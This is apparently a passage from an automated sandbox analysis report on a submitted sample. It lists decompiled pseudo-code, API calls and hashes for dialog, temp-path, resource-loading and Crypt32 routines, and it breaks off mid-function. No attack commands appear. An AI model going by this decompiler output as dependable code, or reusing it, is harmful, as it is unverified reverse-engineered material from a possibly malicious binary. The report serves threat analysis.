                                                        0x00a1c63a
                                                        0x00a1c63a
                                                        0x00a1c640
                                                        0x00a1c640
                                                        0x00000000
                                                        0x00a1c640
                                                        0x00a1c623
                                                        0x00a1c623
                                                        0x00a1c623
                                                        0x00a1c626
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c628
                                                        0x00a1c628
                                                        0x00a1c628
                                                        0x00a1c62b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c631
                                                        0x00a1c631
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c69e
                                                        0x00a1c69e
                                                        0x00a1c6a0
                                                        0x00a1c6a7
                                                        0x00a1c6a8
                                                        0x00a1c6ae
                                                        0x00a1c6b6
                                                        0x00a1c75a
                                                        0x00a1c75a
                                                        0x00a1c75e
                                                        0x00a1c775
                                                        0x00a1c775
                                                        0x00a1c779
                                                        0x00a1c77f
                                                        0x00a1c782
                                                        0x00a1c78f
                                                        0x00a1c78f
                                                        0x00a1c782
                                                        0x00000000
                                                        0x00a1c779
                                                        0x00a1c760
                                                        0x00a1c760
                                                        0x00a1c763
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c769
                                                        0x00a1c770
                                                        0x00000000
                                                        0x00a1c770
                                                        0x00a1c6bc
                                                        0x00a1c6bc
                                                        0x00a1c6c2
                                                        0x00a1c6c4
                                                        0x00a1c6c5
                                                        0x00a1c6ca
                                                        0x00a1c6cb
                                                        0x00a1c6cc
                                                        0x00a1c6ce
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c6d4
                                                        0x00a1c6d4
                                                        0x00a1c6d4
                                                        0x00a1c6d7
                                                        0x00a1c6da
                                                        0x00a1c6da
                                                        0x00a1c6dc
                                                        0x00a1c6df
                                                        0x00a1c6e5
                                                        0x00a1c6e7
                                                        0x00a1c6e8
                                                        0x00a1c6ee
                                                        0x00a1c6ef
                                                        0x00a1c6ef
                                                        0x00a1c6f4
                                                        0x00a1c6f6
                                                        0x00a1c6f8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c6fa
                                                        0x00a1c6fa
                                                        0x00a1c702
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c704
                                                        0x00a1c709
                                                        0x00a1c710
                                                        0x00a1c715
                                                        0x00a1c71c
                                                        0x00a1c71e
                                                        0x00a1c720
                                                        0x00a1c727
                                                        0x00a1c72c
                                                        0x00a1c72e
                                                        0x00a1c730
                                                        0x00a1c732
                                                        0x00a1c732
                                                        0x00a1c738
                                                        0x00a1c73f
                                                        0x00a1c744
                                                        0x00a1c746
                                                        0x00a1c748
                                                        0x00a1c74a
                                                        0x00a1c74a
                                                        0x00a1c74b
                                                        0x00a1c74d
                                                        0x00a1c753
                                                        0x00a1c754
                                                        0x00a1c754
                                                        0x00a1c757
                                                        0x00a1c757
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c96f
                                                        0x00a1c96f
                                                        0x00a1c972
                                                        0x00a1c974
                                                        0x00a1c97b
                                                        0x00a1c97d
                                                        0x00a1c983
                                                        0x00a1c984
                                                        0x00a1c989
                                                        0x00a1c98a
                                                        0x00a1c98a
                                                        0x00a1c98f
                                                        0x00a1c992
                                                        0x00a1c998
                                                        0x00a1c998
                                                        0x00a1c99d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c9a9
                                                        0x00a1c9a9
                                                        0x00a1c9ac
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c9b2
                                                        0x00a1c9b2
                                                        0x00a1c9b4
                                                        0x00a1c9bb
                                                        0x00a1c9c3
                                                        0x00a1c9c8
                                                        0x00a1c9ce
                                                        0x00a1c9cf
                                                        0x00a1c9d2
                                                        0x00a1ca07
                                                        0x00a1ca0c
                                                        0x00a1ca12
                                                        0x00a1ca13
                                                        0x00a1ca18
                                                        0x00a1c9d4
                                                        0x00a1c9d4
                                                        0x00a1c9d7
                                                        0x00a1c9dd
                                                        0x00a1c9f3
                                                        0x00a1c9f8
                                                        0x00a1c9f9
                                                        0x00a1c9fe
                                                        0x00a1c9df
                                                        0x00a1c9df
                                                        0x00a1c9e4
                                                        0x00a1c9e5
                                                        0x00a1c9ea
                                                        0x00a1c9ea
                                                        0x00a1c9dd
                                                        0x00a1ca1f
                                                        0x00a1ca21
                                                        0x00a1ca28
                                                        0x00a1ca37
                                                        0x00a1ca3e
                                                        0x00a1ca43
                                                        0x00a1ca45
                                                        0x00a1ca46
                                                        0x00a1ca4d
                                                        0x00a1ca9e
                                                        0x00a1caa5
                                                        0x00a1caaa
                                                        0x00a1caac
                                                        0x00a1cb6f
                                                        0x00a1cb6f
                                                        0x00000000
                                                        0x00a1cb6f
                                                        0x00a1cab2
                                                        0x00a1cab2
                                                        0x00a1cab4
                                                        0x00a1caba
                                                        0x00a1cac1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1cac7
                                                        0x00a1cac7
                                                        0x00a1cac9
                                                        0x00a1caca
                                                        0x00a1caca
                                                        0x00a1caca
                                                        0x00a1cacd
                                                        0x00a1cad0
                                                        0x00a1cada
                                                        0x00a1cada
                                                        0x00a1cadc
                                                        0x00a1cade
                                                        0x00a1cae8
                                                        0x00a1caed
                                                        0x00a1caef
                                                        0x00a1cb4b
                                                        0x00a1cb4b
                                                        0x00a1cb4e
                                                        0x00a1cb4e
                                                        0x00a1cb50
                                                        0x00a1cb51
                                                        0x00a1cb51
                                                        0x00000000
                                                        0x00a1cb51
                                                        0x00a1caf1
                                                        0x00a1caf8
                                                        0x00a1cafe
                                                        0x00a1cb03
                                                        0x00a1cb05
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1cb07
                                                        0x00a1cb07
                                                        0x00a1cb09
                                                        0x00a1cb0a
                                                        0x00a1cb0c
                                                        0x00a1cb0f
                                                        0x00a1cb29
                                                        0x00a1cb29
                                                        0x00a1cb2b
                                                        0x00a1cb2c
                                                        0x00a1cb2c
                                                        0x00a1cb2c
                                                        0x00a1cb2f
                                                        0x00a1cb2f
                                                        0x00a1cb34
                                                        0x00a1cb39
                                                        0x00a1cb3a
                                                        0x00a1cb40
                                                        0x00a1cb40
                                                        0x00a1cb41
                                                        0x00a1cb46
                                                        0x00000000
                                                        0x00a1cb46
                                                        0x00a1cb11
                                                        0x00a1cb11
                                                        0x00a1cb18
                                                        0x00a1cb1b
                                                        0x00a1cb20
                                                        0x00a1cb21
                                                        0x00000000
                                                        0x00a1cb21
                                                        0x00a1cad2
                                                        0x00a1cad2
                                                        0x00a1cad4
                                                        0x00a1cad5
                                                        0x00a1cad8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1cb53
                                                        0x00a1cb53
                                                        0x00a1cb56
                                                        0x00a1cb56
                                                        0x00a1cb5f
                                                        0x00a1cb64
                                                        0x00a1cb66
                                                        0x00a1cb68
                                                        0x00a1cb6a
                                                        0x00a1cb6a
                                                        0x00000000
                                                        0x00a1ca4f
                                                        0x00a1ca4f
                                                        0x00a1ca4f
                                                        0x00a1ca5c
                                                        0x00a1ca68
                                                        0x00a1ca6e
                                                        0x00a1ca6f
                                                        0x00a1ca70
                                                        0x00a1ca75
                                                        0x00a1ca76
                                                        0x00a1ca77
                                                        0x00a1ca79
                                                        0x00a1ca7f
                                                        0x00a1ca81
                                                        0x00a1ca94
                                                        0x00a1ca94
                                                        0x00a1cb74
                                                        0x00a1cb74
                                                        0x00a1cb7c
                                                        0x00a1cb86
                                                        0x00a1cb8d
                                                        0x00a1cb8d
                                                        0x00a1cb9a
                                                        0x00a1cba1
                                                        0x00a1cba6
                                                        0x00a1cbae
                                                        0x00a1cbba
                                                        0x00a1cbba
                                                        0x00a1cbc7
                                                        0x00a1cbcc
                                                        0x00a1cbd4
                                                        0x00a1cbde
                                                        0x00a1cbeb
                                                        0x00a1cbf2
                                                        0x00a1cbf2
                                                        0x00a1cbff
                                                        0x00a1cc06
                                                        0x00a1cc0b
                                                        0x00a1cc13
                                                        0x00a1cc19
                                                        0x00a1cc1b
                                                        0x00a1cc1b
                                                        0x00a1cc30
                                                        0x00a1cc35
                                                        0x00a1cc41
                                                        0x00a1cc43
                                                        0x00a1cc54
                                                        0x00a1cc61
                                                        0x00000000
                                                        0x00a1cc45
                                                        0x00a1cc45
                                                        0x00a1cc50
                                                        0x00a1cc52
                                                        0x00a1cc66
                                                        0x00a1cc66
                                                        0x00a1cc72
                                                        0x00a1cc7f
                                                        0x00a1cc8b
                                                        0x00a1cc92
                                                        0x00a1cc97
                                                        0x00a1cc9e
                                                        0x00a1cca4
                                                        0x00a1cca6
                                                        0x00a1ccac
                                                        0x00a1ccb2
                                                        0x00a1ccb4
                                                        0x00a1ccbd
                                                        0x00a1ccc0
                                                        0x00a1ccc2
                                                        0x00a1cccb
                                                        0x00a1ccce
                                                        0x00a1ccd4
                                                        0x00a1ccd7
                                                        0x00a1cce0
                                                        0x00a1ccef
                                                        0x00a1ccf4
                                                        0x00a1ccfb
                                                        0x00a1ccfd
                                                        0x00a1ccfe
                                                        0x00a1cd04
                                                        0x00a1cd05
                                                        0x00a1cd07
                                                        0x00a1cd0c
                                                        0x00a1cd0c
                                                        0x00000000
                                                        0x00a1ccfb
                                                        0x00000000
                                                        0x00a1cc52
                                                        0x00a1cc43
                                                        0x00000000
                                                        0x00a1cd14
                                                        0x00a1cd14
                                                        0x00a1cd17
                                                        0x00a1cd19
                                                        0x00a1cd19
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c65d
                                                        0x00a1c65d
                                                        0x00a1c665
                                                        0x00a1c66b
                                                        0x00a1c66e
                                                        0x00a1c692
                                                        0x00a1c670
                                                        0x00a1c670
                                                        0x00a1c673
                                                        0x00a1c686
                                                        0x00a1c675
                                                        0x00a1c675
                                                        0x00a1c677
                                                        0x00a1c67c
                                                        0x00a1c67c
                                                        0x00a1c673
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c799
                                                        0x00a1c799
                                                        0x00a1c79a
                                                        0x00a1c79f
                                                        0x00a1c79f
                                                        0x00a1c79f
                                                        0x00a1c7a2
                                                        0x00a1c7a7
                                                        0x00a1c7ad
                                                        0x00a1c7ad
                                                        0x00a1c7b3
                                                        0x00a1c7b9
                                                        0x00a1c7b9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c0e8
                                                        0x00a1c0e8
                                                        0x00a1c0ed
                                                        0x00a1c0ee
                                                        0x00a1c0ef
                                                        0x00a1c0f4
                                                        0x00a1c0fa
                                                        0x00a1c0fd
                                                        0x00000000
                                                        0x00a1c0ff
                                                        0x00a1c0ff
                                                        0x00000000
                                                        0x00a1c0ff
                                                        0x00a1c0fd
                                                        0x00a1cd51
                                                        0x00a1cd57
                                                        0x00a1cd61
                                                        0x00a1cd61
                                                        0x00a1c841
                                                        0x00a1c841
                                                        0x00a1c848
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c84e
                                                        0x00a1c84e
                                                        0x00a1c850
                                                        0x00a1c857
                                                        0x00a1c85f
                                                        0x00a1c860
                                                        0x00a1c865
                                                        0x00a1c866
                                                        0x00a1c867
                                                        0x00a1c869
                                                        0x00a1c8bd
                                                        0x00a1c8bd
                                                        0x00a1c8c5
                                                        0x00a1c8d3
                                                        0x00a1c8e4
                                                        0x00a1c8f2
                                                        0x00a1c8f2
                                                        0x00a1c8fe
                                                        0x00a1c903
                                                        0x00a1c905
                                                        0x00a1c915
                                                        0x00a1c91f
                                                        0x00a1c924
                                                        0x00a1c927
                                                        0x00000000
                                                        0x00a1c92d
                                                        0x00a1c92d
                                                        0x00a1c932
                                                        0x00a1c932
                                                        0x00a1c934
                                                        0x00a1c93b
                                                        0x00a1c941
                                                        0x00000000
                                                        0x00a1c941
                                                        0x00a1c927
                                                        0x00a1c86b
                                                        0x00a1c86d
                                                        0x00a1c86f
                                                        0x00a1c876
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c878
                                                        0x00a1c878
                                                        0x00a1c87a
                                                        0x00a1c880
                                                        0x00a1c880
                                                        0x00a1c880
                                                        0x00a1c884
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c886
                                                        0x00a1c886
                                                        0x00a1c887
                                                        0x00a1c88d
                                                        0x00a1c890
                                                        0x00a1c892
                                                        0x00a1c895
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c897
                                                        0x00000000
                                                        0x00a1c897
                                                        0x00a1c899
                                                        0x00a1c8a4
                                                        0x00a1c8ae
                                                        0x00a1c8b3
                                                        0x00a1c8b3
                                                        0x00a1c8b5
                                                        0x00000000
                                                        0x00a1c947
                                                        0x00a1c947
                                                        0x00a1c94a
                                                        0x00a1c950
                                                        0x00a1c957
                                                        0x00a1c959
                                                        0x00a1c959
                                                        0x00a1c963
                                                        0x00a1c963
                                                        0x00000000
                                                        0x00a1c94a

                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 00A1C7D9
                                                        • _swprintf.LIBCMT ref: 00A1C80D
                                                          • Part of subcall function 00A03F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A03FA2
                                                        • SetDlgItemTextW.USER32(?,00000066,00A4946A), ref: 00A1C82D
                                                        • EndDialog.USER32(?,00000001), ref: 00A1C941
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf
                                                        • String ID: %s%s%u
                                                        • API String ID: 3182297613-1360425832
                                                        • Opcode ID: def259d176a91aba6b6a7e0276cbd97662a160981122b61507a6b0cae759f556
                                                        • Instruction ID: 22cf59f059034a282651f8b157acaf669d7294d9ec2856d3241e3d0a9695d240
                                                        • Opcode Fuzzy Hash: def259d176a91aba6b6a7e0276cbd97662a160981122b61507a6b0cae759f556
                                                        • Instruction Fuzzy Hash: AC41A075D40618BADB22DBA0DC85FEE7BBCEF48311F0040A6E509E61A0E7B59BC4CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1B07D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1B07D(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xa40ed0, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t21 != 0) {
					_t24 = E00A1A07C(0x65);
				}
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
				} else {
					GetObjectW(_t24, 0x18,  &_v28);
				}
				if(E00A19F7A(_t31) != 0) {
					if(_t21 != 0) {
						_t28 = E00A1A07C(0x66);
						if(_t28 != 0) {
							DeleteObject(_t24);
							_t24 = _t28;
						}
					}
					_t11 = E00A19FBA(_v20);
					_t13 = E00A1A1BD(_t23, _t35, _t24, E00A19F99(_v24), _t11);
					DeleteObject(_t24);
					_t24 = _t13;
				}
				return _t24;
			}














                                                        0x00a1b07d
                                                        0x00a1b07d
                                                        0x00a1b093
                                                        0x00a1b097
                                                        0x00a1b09c
                                                        0x00a1b0a5
                                                        0x00a1b0a5
                                                        0x00a1b0a7
                                                        0x00a1b0a9
                                                        0x00a1b0ba
                                                        0x00a1b0c1
                                                        0x00a1b0ab
                                                        0x00a1b0b2
                                                        0x00a1b0b2
                                                        0x00a1b0cf
                                                        0x00a1b0d4
                                                        0x00a1b0dd
                                                        0x00a1b0e1
                                                        0x00a1b0e4
                                                        0x00a1b0ea
                                                        0x00a1b0ea
                                                        0x00a1b0e1
                                                        0x00a1b0ef
                                                        0x00a1b0ff
                                                        0x00a1b107
                                                        0x00a1b10d
                                                        0x00a1b10f
                                                        0x00a1b117

                                                        APIs
                                                        • LoadBitmapW.USER32(00000065), ref: 00A1B08D
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00A1B0B2
                                                        • DeleteObject.GDI32(00000000), ref: 00A1B0E4
                                                        • DeleteObject.GDI32(00000000), ref: 00A1B107
                                                          • Part of subcall function 00A1A07C: FindResourceW.KERNEL32(00A1B0DD,PNG,?,?,?,00A1B0DD,00000066), ref: 00A1A08E
                                                          • Part of subcall function 00A1A07C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A1B0DD,00000066), ref: 00A1A0A6
                                                          • Part of subcall function 00A1A07C: LoadResource.KERNEL32(00000000,?,?,?,00A1B0DD,00000066), ref: 00A1A0B9
                                                          • Part of subcall function 00A1A07C: LockResource.KERNEL32(00000000,?,?,?,00A1B0DD,00000066), ref: 00A1A0C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                        • String ID: ]
                                                        • API String ID: 142272564-3352871620
                                                        • Opcode ID: 33374a34077e58fd98b0cf069c6a7b4869beaa14767ec93f087de3d7b379cbcd
                                                        • Instruction ID: d9fb7cbf0cd95c33300a1fe941ff8e58cf06c34955d6dfa79f529c2992f5a0f1
                                                        • Opcode Fuzzy Hash: 33374a34077e58fd98b0cf069c6a7b4869beaa14767ec93f087de3d7b379cbcd
                                                        • Instruction Fuzzy Hash: F1012636540606B7C72067A49D05BFF7A7AAF89B52F090010FD00A7291CF728C5683B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1CF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E00A1CF50(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00A0130B(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xa5ecac = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xa5ecac);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xa5ecac, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                        0x00a1cf51
                                                        0x00a1cf56
                                                        0x00a1cf5b
                                                        0x00a1cf60
                                                        0x00a1cf78
                                                        0x00a1cfda
                                                        0x00000000
                                                        0x00a1cfdc
                                                        0x00a1cf7a
                                                        0x00a1cf80
                                                        0x00a1cfbf
                                                        0x00a1cfc5
                                                        0x00a1cfd4
                                                        0x00000000
                                                        0x00a1cfd4
                                                        0x00a1cf85
                                                        0x00a1cf94
                                                        0x00000000
                                                        0x00a1cf94
                                                        0x00a1cf8a
                                                        0x00a1cf8d
                                                        0x00a1cfb1
                                                        0x00a1cfb7
                                                        0x00a1cf9a
                                                        0x00a1cf9b
                                                        0x00000000
                                                        0x00a1cf9b
                                                        0x00a1cf92
                                                        0x00a1cf98
                                                        0x00000000
                                                        0x00a1cf98
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                          • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        • EndDialog.USER32(?,00000001), ref: 00A1CF9B
                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A1CFB1
                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A1CFC5
                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 00A1CFD4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: RENAMEDLG
                                                        • API String ID: 445417207-3299779563
                                                        • Opcode ID: 70041b48f44c00c32014f39996abcac1b89d77ca3ae95facd99704b0c127aff3
                                                        • Instruction ID: bc3f65fdd63fed6214a7701dd9ace86ccfce76054d483fd9a3a9426082b80c93
                                                        • Opcode Fuzzy Hash: 70041b48f44c00c32014f39996abcac1b89d77ca3ae95facd99704b0c127aff3
                                                        • Instruction Fuzzy Hash: FD01B1322C87117ED611CBA49D09FA77B6EFB5AB12F140401F302A60D0C6A6995BC765
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A27893 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A27844,?,?,00A277E4,?,00A3BAD8,0000000C,00A2793B,?,00000002), ref: 00A278B3
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A278C6
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00A27844,?,?,00A277E4,?,00A3BAD8,0000000C,00A2793B,?,00000002,00000000), ref: 00A278E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: afa080512e662c7323508a440335f432a5c86f15b3a496d5f4a13ab8a5eda20a
                                                        • Instruction ID: eb42a4f62ab6cbbafe3c7397187ab082b6907b81ef51f9a4883676c3e06ad4b2
                                                        • Opcode Fuzzy Hash: afa080512e662c7323508a440335f432a5c86f15b3a496d5f4a13ab8a5eda20a
                                                        • Instruction Fuzzy Hash: 67F04F31A08218BBCF15DBA8DC09B9EBFB8EF04711F0041A9F805A6190DB709E81DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0EE4E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0EE4E(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00A10360(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                                                        0x00a0ee4f
                                                        0x00a0ee55
                                                        0x00a0ee5c
                                                        0x00a0ee61
                                                        0x00a0ee65
                                                        0x00a0ee7a
                                                        0x00a0ee7d
                                                        0x00a0ee83
                                                        0x00a0ee83
                                                        0x00a0ee86
                                                        0x00000000
                                                        0x00a0ee86
                                                        0x00a0ee8b

                                                        APIs
                                                          • Part of subcall function 00A10360: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A1037B
                                                          • Part of subcall function 00A10360: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EE61,Crypt32.dll,00000000,00A0EEE5,?,?,00A0EEC7,?,?,?), ref: 00A1039D
                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A0EE6D
                                                        • GetProcAddress.KERNEL32(00A481C0,CryptUnprotectMemory), ref: 00A0EE7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                        • API String ID: 2141747552-1753850145
                                                        • Opcode ID: 08c09ae90ffb0d4ce3fae4eec3980f08576e2ec693c98f7914ece3fd19aae5aa
                                                        • Instruction ID: 4f63c73751393a5366d2fb885ae31e350351c8cd55012cd1709bae91cbc749b7
                                                        • Opcode Fuzzy Hash: 08c09ae90ffb0d4ce3fae4eec3980f08576e2ec693c98f7914ece3fd19aae5aa
                                                        • Instruction Fuzzy Hash: 48E04672808785FECF309F74ED19B46BAE4AB15B01F008C5EF49AD7680D6F4D5808B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A280C8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E00A280C8(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
